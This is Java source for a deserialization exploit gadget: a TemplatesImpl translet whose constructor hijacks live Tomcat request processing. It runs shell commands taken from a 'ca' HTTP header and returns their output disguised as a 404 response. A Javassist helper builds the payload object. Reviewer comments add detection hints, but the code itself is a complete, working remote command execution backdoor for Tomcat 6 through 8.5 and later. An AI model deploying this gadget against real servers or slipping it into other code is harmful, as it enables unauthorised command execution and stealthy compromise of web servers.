/**
 * Translet whose constructor reflectively walks Tomcat's connector internals,
 * reads the current request's {@code ca} header and runs its value as a shell
 * command, echoing the output back in the response. All behaviour lives in the
 * constructor, so it fires as soon as the class is instantiated (the
 * {@code transform} methods are empty stubs). Everything below is reached by
 * {@code setAccessible(true)} on private Tomcat fields, so the field names
 * ("threads", "target", "this$0", "handler", "global", "processors", "req")
 * are version-specific and are what the try/catch fallbacks select between.
 */
public static class Tomback extends AbstractTranslet {
    // Reads a private (declared) field of o by name, bypassing access checks.
    // Throws NoSuchFieldException when the field is absent; the constructor
    // relies on that to detect which Tomcat layout it is running against.
    public Object getO(Object o,String s) throws Exception{
        Field f = o.getClass().getDeclaredField(s);
        f.setAccessible(true);
        return f.get(o);
    }

    public Tomback() throws Exception{
        Object o;
        String s;
        // Enumerate the thread group's private "threads" array and look for a
        // thread named like the HTTP connector (contains "http", not "exec").
        // NOTE(review): presumably this is the endpoint's acceptor/poller
        // thread; the name filter is the only selector, so a differently
        // named connector thread is not matched.
        for (Thread t:(Thread[])getO(Thread.currentThread().getThreadGroup(),"threads")){
            s = t.getName();
            if (!s.contains("exec") && s.contains("http")){
                try{
                    // thread.target -> enclosing endpoint (this$0) -> its handler
                    o = getO(getO(getO(t,"target"),"this$0"),"handler");
                }catch (Exception e){
                    //tomcat 8.5.* ~ : handler is declared on AbstractEndpoint
                    o = getO(getO(t,"target"),"this$0");
                    Field f = AbstractEndpoint.class.getDeclaredField("handler");
                    f.setAccessible(true);
                    o = f.get(o);
                }
                try{
                    //tomcat 6.* : handler has a "global" field
                    o = getO(o,"global");
                }catch (Exception e){
                    //tomcat7.*-8.0.* : handler's superclass exposes getGlobal()
                    o = o.getClass().getSuperclass().getDeclaredMethod("getGlobal").invoke(o);
                }
                // Iterate the registered processors and inspect each one's
                // in-flight request ("req").
                for (Object p:(ArrayList<?>)getO(o,"processors")){
                    o = getO(p,"req");
                    // The "ca" request header is the command channel. Detection
                    // hint: inbound requests carrying a "ca" header that normal
                    // clients never send.
                    s = (String)o.getClass().getMethod("getHeader",String.class).invoke(o,"ca");
                    if(!s.isEmpty()){
                        // Header value is passed verbatim to a shell: cmd.exe /c on
                        // Windows, /bin/sh -c elsewhere. Detection hint: the Tomcat
                        // JVM spawning cmd.exe or sh child processes.
                        String[] cmd = System.getProperty("os.name").toLowerCase().contains("window")?new String[]{"cmd.exe","/c",s}:new String[]{"/bin/sh","-c",s};
                        // Read the child's entire stdout (\A delimiter = whole stream).
                        byte[] cm = new java.util.Scanner(new ProcessBuilder(cmd).start().getInputStream()).useDelimiter("\\A").next().getBytes();
                        ByteChunk bc = new ByteChunk();
                        bc.setBytes(cm,0,cm.length);
                        // Write the output into the response with a 404 status,
                        // presumably so the exchange blends in with not-found
                        // noise in access logs. Detection hint: 404 responses
                        // carrying a non-template body.
                        o = o.getClass().getMethod("getResponse").invoke(o);
                        o.getClass().getMethod("setStatus",int.class).invoke(o,404);
                        o.getClass().getMethod("doWrite",ByteChunk.class).invoke(o,bc);
                        break;
                    }
                }
                break;
            }
        }
    }

    // Required by AbstractTranslet; intentionally does nothing.
    public void transform ( DOM document, SerializationHandler[] handlers ) throws TransletException {}

    // Required by AbstractTranslet; intentionally does nothing.
    @Override public void transform ( DOM document, DTMAxisIterator iterator, SerializationHandler handler ) throws TransletException {}
}
/**
 * Builds a {@code TemplatesImpl} whose private {@code _bytecodes} holds the
 * {@link Tomback} class, re-parented onto {@code AbstractTranslet} via
 * Javassist, so that instantiating the translet runs the Tomback constructor.
 *
 * @param cmd unused — the body never references it; the command is taken at
 *            runtime from the request header inside {@link Tomback} instead
 * @return the prepared {@code TemplatesImpl} (typed as {@code Object})
 * @throws Exception on any reflection, class-pool or bytecode failure
 */
public static Object createTemplatesImpl(final String cmd) throws Exception {
    TemplatesImpl templates = TemplatesImpl.class.newInstance();
    ClassPool classPool = ClassPool.getDefault();
    // Make both the translet base class and Tomback resolvable in the pool.
    classPool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
    classPool.insertClassPath(new ClassClassPath(Tomback.class));
    CtClass clazz = classPool.get(Tomback.class.getName());
    CtClass superC = classPool.get(AbstractTranslet.class.getName());
    clazz.setSuperclass(superC);
    final byte[] classBytes = clazz.toBytecode();
    // Private TemplatesImpl fields set reflectively: _bytecodes (the class
    // to load) and _name (the translet name, here just "a").
    Field bcField = TemplatesImpl.class.getDeclaredField("_bytecodes");
    bcField.setAccessible(true);
    bcField.set(templates, new byte[][] {classBytes});
    Field nameField = TemplatesImpl.class.getDeclaredField("_name");
    nameField.setAccessible(true);
    nameField.set(templates, "a");
    // Side effect: Javassist writes the generated .class file to the current
    // working directory — an on-disk artifact worth looking for in forensics.
    clazz.writeFile();
    return templates;
}